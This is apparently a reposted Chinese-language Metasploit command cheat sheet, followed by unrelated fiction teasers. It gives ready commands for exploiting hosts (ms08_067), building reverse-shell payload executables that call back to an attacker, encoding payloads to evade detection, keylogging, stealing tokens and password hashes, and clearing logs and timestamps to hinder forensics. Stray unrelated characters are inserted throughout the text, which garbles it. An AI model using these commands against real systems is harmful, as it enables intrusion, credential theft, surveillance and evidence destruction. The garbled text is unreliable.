Metasploit 常用滲透命令大全【轉(zhuǎn)】

show exploits
列出metasploit框架中的所有滲透攻擊模塊。
show payloads
列出metasploit框架中的所有攻擊載荷训堆。
show auxiliary
列出metasploit框架中的所有輔助攻擊載荷。
search name
查找metasploit框架中所有的滲透攻擊和其他模塊白嘁。
info
展示出制定滲透攻擊或模塊的相關(guān)信息坑鱼。
use name
裝載一個(gè)滲透攻擊或模塊。

LHOST
你本地可以讓目標(biāo)主機(jī)連接的IP地址絮缅,通常當(dāng)目標(biāo)主機(jī)不在同一個(gè)局域網(wǎng)內(nèi)時(shí)鲁沥,就需要是一個(gè)公共IP地址,特別為反彈式shell使用耕魄。
RHOST
遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)画恰。
set function
設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。
setg function
以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))吸奴。
show options
列出某個(gè)滲透攻擊或模塊中所有的配置參數(shù)允扇。
show targets
列出滲透攻擊所有支持的目標(biāo)平臺(tái)。
set target num
指定你所知道的目標(biāo)的操作系統(tǒng)以及補(bǔ)丁版本類型则奥。
set payload name
指定想要使用的攻擊載荷考润。
show advanced
列出所有高級(jí)配置選項(xiàng)。
set autorunscript migrate -f.
在滲透攻擊完成后读处,將自動(dòng)遷移到另一個(gè)進(jìn)程糊治。
check
檢測(cè)目標(biāo)是否選定滲透攻擊存在相應(yīng)的安全漏洞。
exploit
執(zhí)行滲透攻擊或模塊來攻擊目標(biāo)罚舱。
exploit -j
在計(jì)劃任務(wù)下進(jìn)行滲透攻擊(攻擊將在后臺(tái)進(jìn)行)井辜。
exploit -z
滲透攻擊完成后不與回話進(jìn)行交互绎谦。
exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。
exploit -h
列出exploit命令的幫助信息粥脚。
sessions -l
列出可用的交互會(huì)話(在處理多個(gè)shell時(shí)使用)窃肠。
sessions -l -v
列出所有可用的交互會(huì)話以及詳細(xì)信息,EG:攻擊系統(tǒng)時(shí)使用了哪個(gè)安全漏洞阿逃。
sessions -s script
在所有活躍的metasploit會(huì)話中運(yùn)行一個(gè)特定的metasploit腳本铭拧。
sessions -K
殺死所有活躍的交互會(huì)話。
sessions -c cmd
在所有活躍的metasploit會(huì)話上執(zhí)行一個(gè)命令恃锉。
sessions -u sessionID
升級(jí)一個(gè)普通的win32 shell到metasploit shell。
db_create name
創(chuàng)建一個(gè)數(shù)據(jù)庫驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(EG:db_create autopwn)呕臂。
db_connect name
創(chuàng)建并連接一個(gè)數(shù)據(jù)庫驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(EG:db_connect user:passwd@ip/sqlname)破托。
db_namp
利用nmap并把掃描數(shù)據(jù)存儲(chǔ)到數(shù)據(jù)庫中(支持普通的nmap語句,EG:-sT -v -P0)歧蒋。
db_autopwn -h
展示出db_autopwn命令的幫助信息土砂。
db_autopwn -p -r -e
對(duì)所有發(fā)現(xiàn)的開放端口執(zhí)行db_autopwn,攻擊所有系統(tǒng)谜洽,并使用一個(gè)反彈式shell萝映。
db_destroy
刪除當(dāng)前數(shù)據(jù)庫。
db_destroy user:passwd@host:port/database
使用高級(jí)選項(xiàng)來刪除數(shù)據(jù)庫阐虚。
metasploit命令
help
打開meterpreter使用幫助序臂。
run scriptname
運(yùn)行meterpreter腳本实束,在scripts/meterpreter目錄下可查看到所有腳本名。
sysinfo
列出受控主機(jī)的系統(tǒng)信息构订。
ls
列出目標(biāo)主機(jī)的文件和文件夾信息悼瘾。
use priv
加載特權(quán)提升擴(kuò)展模塊审胸,來擴(kuò)展metasploit庫歹嘹。
ps
顯示所有運(yùn)行的進(jìn)程以及相關(guān)聯(lián)的用戶賬戶。
migrate PID
遷移到一個(gè)指定的進(jìn)程ID(PID號(hào)可通過ps命令從主機(jī)上獲得)材蛛。
use incognito
加載incognito功能(用來盜竊目標(biāo)主機(jī)的令牌或假冒用戶)
list_tokens -u
列出目標(biāo)主機(jī)用戶的可用令牌。
list_tokens -g
列出目標(biāo)主機(jī)用戶組的可用令牌芽淡。
impersonate_token DOMAIN_NAME\USERNAME
假冒目標(biāo)主機(jī)上的可用令牌挣菲。
steal_token PID
盜竊給定進(jìn)程的可用令牌并進(jìn)行令牌假冒掷邦。
drop_token
停止假冒當(dāng)前令牌抚岗。
getsystem
通過各種攻擊向量來提升系統(tǒng)用戶權(quán)限。
execute -f cmd.exe -i
執(zhí)行cmd.exe命令并進(jìn)行交互向抢。
execute -f cmd.exe -i -t
以所有可用令牌來執(zhí)行cmd命令并隱藏該進(jìn)程挟鸠。
rev2self
回到控制目標(biāo)主機(jī)的初始用戶賬戶下亩冬。
reg command
在目標(biāo)主機(jī)注冊(cè)表中進(jìn)行交互,創(chuàng)建枢冤,刪除铜秆,查詢等操作连茧。
setdesktop number
切換到另一個(gè)用戶界面(該功能基于那些用戶已登錄)。
screenshot
對(duì)目標(biāo)主機(jī)的屏幕進(jìn)行截圖啸驯。
upload file
向目標(biāo)主機(jī)上傳文件罚斗。
download file
從目標(biāo)主機(jī)下載文件。
keyscan_start
針對(duì)遠(yuǎn)程目標(biāo)主機(jī)開啟鍵盤記錄功能袱吆。
keyscan_dump
存儲(chǔ)目標(biāo)主機(jī)上捕獲的鍵盤記錄。
keyscan_stop
停止針對(duì)目標(biāo)主機(jī)的鍵盤記錄婶希。
getprivs
盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)喻杈。
uictl enable keyboard/mouse
接管目標(biāo)主機(jī)的鍵盤和鼠標(biāo)狰晚。
background
將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺(tái)執(zhí)行。
hashdump
導(dǎo)出目標(biāo)主機(jī)中的口令哈希值龄砰。
use sniffer
加載嗅探模式。
sniffer_interfaces
列出目標(biāo)主機(jī)所有開放的網(wǎng)絡(luò)端口式镐。
sniffer_dump interfaceID pcapname
在目標(biāo)主機(jī)上啟動(dòng)嗅探。
sniffer_start interfaceID packet-buffer
在目標(biāo)主機(jī)上針對(duì)特定范圍的數(shù)據(jù)包緩沖區(qū)啟動(dòng)嗅探歹茶。
sniffer_stats interfaceID
獲取正在實(shí)施嗅探網(wǎng)絡(luò)接口的統(tǒng)計(jì)數(shù)據(jù)你弦。
sniffer_stop interfaceID
停止嗅探禽作。
add_user username password -h ip
在遠(yuǎn)程目標(biāo)主機(jī)上添加一個(gè)用戶旷偿。
clearev
清楚目標(biāo)主機(jī)上的日志記錄。
timestomp
修改文件屬性萍程,例如修改文件的創(chuàng)建時(shí)間(反取證調(diào)查)茫负。
reboot
重啟目標(biāo)主機(jī)。
MSFpayload命令
msfpayload -h
msfpayload的幫助信息潮尝。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(xiàng)(任何攻擊載荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷友题,回連到LHOSTip的LPORT度宦,將其保存為名為payload.exe的windows下可執(zhí)行程序告匠。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷后专,回連到LHOSTip的LPORT,將其保存為名為payload.raw戚哎,該文件后面的msffencode中使用型凳。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷,導(dǎo)出C格式的shellcode埂蕊。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷蓄氧,導(dǎo)出成以%u編碼方式的javaScript語言字符串槐脏。
msfencode命令
mefencode -h
列出msfencode的幫助命令。
msfencode -l
列出所有可用的編碼器准给。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
顯示編碼緩沖區(qū)的格式露氮。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai編碼器對(duì)payload.raw文件進(jìn)行5編碼,然后導(dǎo)出一個(gè)名為encoded_payload.exe的文件局扶。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
創(chuàng)建一個(gè)經(jīng)過多種編碼格式嵌套編碼的攻擊載荷三妈。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
創(chuàng)建一個(gè)純字母數(shù)字的shellcode畴蒲,由ESI寄存器只想shellcode,以C語言格式輸出咖祭。
MSFcli命令
msfcli | grep exploit
僅列出滲透攻擊模塊么翰。
msfcli | grep exploit/windows
僅列出與windows相關(guān)的滲透攻擊模塊辽旋。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對(duì)IP發(fā)起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷码耐,并綁定在PORT端口進(jìn)行監(jiān)聽伐坏。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市每瞒,隨后出現(xiàn)的幾起案子剿骨,更是在濱河造成了極大的恐慌浓利,老刑警劉巖贷掖,帶你破解...
    沈念sama閱讀 206,839評(píng)論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異昆咽,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)调违,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,543評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來浮声,“玉大人,你說我怎么就攤上這事雳锋∠劢啵” “怎么了筑煮?”我有些...
    開封第一講書人閱讀 153,116評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵真仲,是天一觀的道長(zhǎng)秸应。 經(jīng)常有香客問我软啼,道長(zhǎng)祸挪,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,371評(píng)論 1 279
  • 正文 為了忘掉前任雹仿,我火速辦了婚禮胧辽,結(jié)果婚禮上票顾,老公的妹妹穿的比我還像新娘奠骄。我一直安慰自己,他們只是感情好影锈,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,384評(píng)論 5 374
  • 文/花漫 我一把揭開白布鸭廷。 她就那樣靜靜地躺著辆床,像睡著了一般讼载。 火紅的嫁衣襯著肌膚如雪咨堤。 梳的紋絲不亂的頭發(fā)上一喘,一...
    開封第一講書人閱讀 49,111評(píng)論 1 285
  • 那天凸克,我揣著相機(jī)與錄音闷沥,去河邊找鬼触徐。 笑死,一個(gè)胖子當(dāng)著我的面吹牛狐赡,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播疟丙,決...
    沈念sama閱讀 38,416評(píng)論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼颖侄,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了享郊?” 一聲冷哼從身側(cè)響起览祖,我...
    開封第一講書人閱讀 37,053評(píng)論 0 259
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎炊琉,沒想到半個(gè)月后展蒂,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體又活,經(jīng)...
    沈念sama閱讀 43,558評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,007評(píng)論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片曲初。...
    茶點(diǎn)故事閱讀 38,117評(píng)論 1 334
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡幌绍,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出奖唯,到底是詐尸還是另有隱情,我是刑警寧澤病往,帶...
    沈念sama閱讀 33,756評(píng)論 4 324
  • 正文 年R本政府宣布畔勤,位于F島的核電站,受9級(jí)特大地震影響缸榛,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜卖氨,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,324評(píng)論 3 307
  • 文/蒙蒙 一系吭、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧则吟,春花似錦氓仲、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,315評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至按傅,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間惜纸,已是汗流浹背压汪。 一陣腳步聲響...
    開封第一講書人閱讀 31,539評(píng)論 1 262
  • 我被黑心中介騙來泰國(guó)打工亭引, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人主届。 一個(gè)月前我還...
    沈念sama閱讀 45,578評(píng)論 2 355
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親华嘹。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,877評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容